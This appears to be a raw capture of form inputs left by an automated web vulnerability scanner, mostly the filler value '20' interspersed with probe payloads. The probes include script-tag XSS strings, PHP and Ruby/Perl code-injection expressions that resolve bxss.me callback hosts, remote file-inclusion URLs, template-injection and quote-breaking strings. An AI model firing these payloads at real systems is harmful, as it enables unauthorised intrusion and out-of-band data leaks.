20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
209088755
20
20
20
20
'"()&%<acx><ScRiPt >H79P(9560)</ScRiPt>
20
20
20
20
20'"()&%<acx><ScRiPt >H79P(9520)</ScRiPt>
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
<!--
20
20
20
20
'"
20
20
20
20
20
20
/xfs.bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
20
index.php/.
20
20
20
20
index.php
20
20
20
20
index.php
20
20
20
20
20
20
20
20
20
20
20
20
20
'+'A'.concat(70-3).concat(22*4).concat(117).concat(84).concat(109).concat(67)+(require'socket'
Socket.gethostbyname('hitop'+'ihnxdbxr410c1.bxss.me.')[3].to_s)+'
20
20
20
20
"+"A".concat(70-3).concat(22*4).concat(99).concat(75).concat(113).concat(80)+(require"socket"
Socket.gethostbyname("hitcn"+"mtavdqdw87c62.bxss.me.")[3].to_s)+"
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
bxss.me/t/xss.html?%00
20
https://bxss.me/t/xss.html?%00
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'.print(md5(31337)).'
20
20
20
20
${@print(md5(31337))}\
20
20
20
20
${@print(md5(31337))}
20
20
20
20
";print(md5(31337));$a="
20
20
20
20
';print(md5(31337));$a='
20
20
20
20
;print(md5(31337));
20
20
20
".gethostbyname(lc("hitgk"."tzchikkifdf82.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(73).chr(97).chr(73)."
20
20
20
20
'.gethostbyname(lc('hitqk'.'grxnnxge20b91.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(78).chr(115).chr(67).'
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
'"()
20
20
20
20
Array
20
20
20
20
20
20
20
20
20
20
^(#$!@#$)(()))******
20
20
20
20
!(()&&!|*|*|
20
20
20
20
)
bxss.me
20
20
20
20
https://bxss.me/t/fit.txt?.jpg
20
20
20&n924933=v940548
20
https://bxss.me/t/fit.txt
20
20
20
20
1some_inexistent_file_with_long_name .jpg
20
20
20
20
https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
20
20
20
20
20
${10000394+10000310}
20
20
20
20
20
20
20
@@lOqa1
20
20
20
20
1 ????%2527%2522
20
20